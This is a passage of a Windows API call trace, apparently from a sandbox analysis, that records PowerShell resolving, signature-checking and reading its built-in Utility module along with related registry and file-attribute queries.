CoTaskMemAlloc (cb=0x50) returned 0x1e351413840 [0145.203] WinVerifyTrust () returned 0x0 [0145.208] CoTaskMemFree (pv=0x1e351413840) [0145.208] CoTaskMemFree (pv=0x1e351345220) [0145.208] CertFreeCertificateContext (pCertContext=0x1e3513ece20) returned 1 [0145.208] CloseHandle (hObject=0x704) returned 1 [0145.226] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0145.226] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0145.241] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8bdc0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.241] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0xb156f8bd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0145.311] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0xb156f8bdc0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0145.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c210) returned 1 [0145.311] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c2f0 | out: lpFileInformation=0xb156f8c2f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c1d0) returned 1 [0145.312] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0145.312] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0145.313] CoTaskMemAlloc (cb=0x20e) returned 0x1e35140f850 [0145.313] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e35140f850, nSize=0x105 | out: lpBuffer="") returned 0x97 [0145.313] CoTaskMemFree (pv=0x1e35140f850) [0145.313] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8bb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0145.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8bfd0) returned 1 [0145.313] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c0b0 | out: lpFileInformation=0xb156f8c0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8bf90) returned 1 [0145.315] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0145.327] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8bb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0145.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8bfd0) returned 1 [0145.328] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c0b0 | out: lpFileInformation=0xb156f8c0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0145.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8bf90) returned 1 [0145.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8bb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0145.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8bfd0) returned 1 [0145.328] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c0b0 | out: lpFileInformation=0xb156f8c0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0145.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8bf90) returned 1 [0145.330] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0xb156f8b9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0145.330] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8be30) returned 1 [0145.330] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0xb156f8bf10 | out: lpFileInformation=0xb156f8bf10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.330] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8bdf0) returned 1 [0145.332] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0145.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0xb156f8b9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0145.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8be30) returned 1 [0145.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0xb156f8bf10 | out: lpFileInformation=0xb156f8bf10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8bdf0) returned 1 [0145.337] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0146.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xb156f8b930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0146.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xb156f8b830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0146.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xb156f8b5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0146.393] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0146.393] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b780, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.393] CoTaskMemAlloc (cb=0x20c) returned 0x1e3514310a0 [0146.393] GetSystemDirectoryW (in: lpBuffer=0x1e3514310a0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0146.393] CoTaskMemFree (pv=0x1e3514310a0) [0146.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8b650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0146.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8baa0) returned 1 [0146.394] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xb156f8bb80 | out: lpFileInformation=0xb156f8bb80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0146.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ba60) returned 1 [0146.394] WldpGetLockdownPolicy () returned 0x0 [0146.394] GetSystemInfo (in: lpSystemInfo=0xb156f8bbe0 | out: lpSystemInfo=0xb156f8bbe0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0146.394] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8bae8 | out: phkResult=0xb156f8bae8*=0x704) returned 0x0 [0146.394] RegQueryValueExW (in: hKey=0x704, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8bb38, lpData=0x0, lpcbData=0xb156f8bb30*=0x0 | out: lpType=0xb156f8bb38*=0x0, lpData=0x0, lpcbData=0xb156f8bb30*=0x0) returned 0x2 [0146.395] RegCloseKey (hKey=0x704) returned 0x0 [0146.395] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b620, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8bac0) returned 1 [0146.395] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1e3393e6400 | out: lpFileInformation=0x1e3393e6400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0146.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ba80) returned 1 [0146.395] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b5e0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ba30) returned 1 [0146.395] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8bb10 | out: lpFileInformation=0xb156f8bb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0146.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b9f0) returned 1 [0146.395] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b590, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.395] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b4c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b910) returned 1 [0146.396] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b9f0 | out: lpFileInformation=0xb156f8b9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0146.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b8d0) returned 1 [0146.396] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b3c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b8a0) returned 1 [0146.396] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x704 [0146.396] GetFileType (hFile=0x704) returned 0x1 [0146.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b810) returned 1 [0146.396] GetFileType (hFile=0x704) returned 0x1 [0146.396] WTGetSignatureInfo () returned 0x0 [0146.422] CertDuplicateCertificateContext (pCertContext=0x1e3513ed420) returned 0x1e3513ed420 [0146.422] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8b938 | out: phkResult=0xb156f8b938*=0x754) returned 0x0 [0146.422] RegQueryValueExW (in: hKey=0x754, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8b988, lpData=0x0, lpcbData=0xb156f8b980*=0x0 | out: lpType=0xb156f8b988*=0x1, lpData=0x0, lpcbData=0xb156f8b980*=0x56) returned 0x0 [0146.422] RegQueryValueExW (in: hKey=0x754, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8b988, lpData=0x1e3393e6fd8, lpcbData=0xb156f8b980*=0x56 | out: lpType=0xb156f8b988*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8b980*=0x56) returned 0x0 [0146.422] RegCloseKey (hKey=0x754) returned 0x0 [0146.422] CoTaskMemAlloc (cb=0x10) returned 0x1e3513465e0 [0146.423] CoTaskMemAlloc (cb=0x50) returned 0x1e351412c40 [0146.423] WinVerifyTrust () returned 0x0 [0146.423] CoTaskMemFree (pv=0x1e351412c40) [0146.423] CoTaskMemFree (pv=0x1e3513465e0) [0146.423] CertFreeCertificateContext (pCertContext=0x1e3513ed420) returned 1 [0146.423] CloseHandle (hObject=0x704) returned 1 [0146.424] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xb156f8b550, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0146.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ba30) returned 1 [0146.424] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x704 [0146.424] GetFileType (hFile=0x704) returned 0x1 [0146.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b9a0) returned 1 [0146.424] GetFileType (hFile=0x704) returned 0x1 [0146.424] SetFilePointer (in: hFile=0x704, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8b9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8b9e8*=0) returned 0x0 [0146.424] ReadFile (in: hFile=0x704, lpBuffer=0x1e3393e8218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8ba68, lpOverlapped=0x0 | out: lpBuffer=0x1e3393e8218*, lpNumberOfBytesRead=0xb156f8ba68*=0x1000, lpOverlapped=0x0) returned 1 [0146.425] SetFilePointer (in: hFile=0x704, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8b9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8b9e8*=0) returned 0x1000 [0146.425] ReadFile (in: hFile=0x704, lpBuffer=0x1e3393e8218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8ba68, lpOverlapped=0x0 | out: lpBuffer=0x1e3393e8218*, lpNumberOfBytesRead=0xb156f8ba68*=0x1000, lpOverlapped=0x0) returned 1 [0146.425] SetFilePointer (in: hFile=0x704, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8b9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8b9e8*=0) returned 0x2000 [0146.425] ReadFile (in: hFile=0x704, lpBuffer=0x1e3393e8218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8ba68, lpOverlapped=0x0 | out: lpBuffer=0x1e3393e8218*, lpNumberOfBytesRead=0xb156f8ba68*=0x1000, lpOverlapped=0x0) returned 1 [0146.426] SetFilePointer (in: hFile=0x704, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8b9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8b9e8*=0) returned 0x3000 [0146.426] ReadFile (in: hFile=0x704, lpBuffer=0x1e3393e8218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8ba68, lpOverlapped=0x0 | out: lpBuffer=0x1e3393e8218*, lpNumberOfBytesRead=0xb156f8ba68*=0x1000, lpOverlapped=0x0) returned 1 [0146.426] SetFilePointer (in: hFile=0x704, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8b9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8b9e8*=0) returned 0x4000 [0146.426] ReadFile (in: hFile=0x704, lpBuffer=0x1e3393e8218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8ba68, lpOverlapped=0x0 | out: lpBuffer=0x1e3393e8218*, lpNumberOfBytesRead=0xb156f8ba68*=0x1000, lpOverlapped=0x0) returned 1 [0146.426] SetFilePointer (in: hFile=0x704, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8b9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8b9e8*=0) returned 0x5000 [0146.426] ReadFile (in: hFile=0x704, lpBuffer=0x1e3393e8218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8ba68, lpOverlapped=0x0 | out: lpBuffer=0x1e3393e8218*, lpNumberOfBytesRead=0xb156f8ba68*=0x298, lpOverlapped=0x0) returned 1 [0146.427] SetFilePointer (in: hFile=0x704, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8b9e8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8b9e8*=0) returned 0x5298 [0146.427] ReadFile (in: hFile=0x704, lpBuffer=0x1e3393e8218, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8ba68, lpOverlapped=0x0 | out: lpBuffer=0x1e3393e8218*, lpNumberOfBytesRead=0xb156f8ba68*=0x0, lpOverlapped=0x0) returned 1 [0146.427] CoTaskMemAlloc (cb=0x20c) returned 0x1e351433080 [0146.427] GetSystemDirectoryW (in: lpBuffer=0x1e351433080, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0146.427] CoTaskMemFree (pv=0x1e351433080) [0146.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8b530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0146.427] 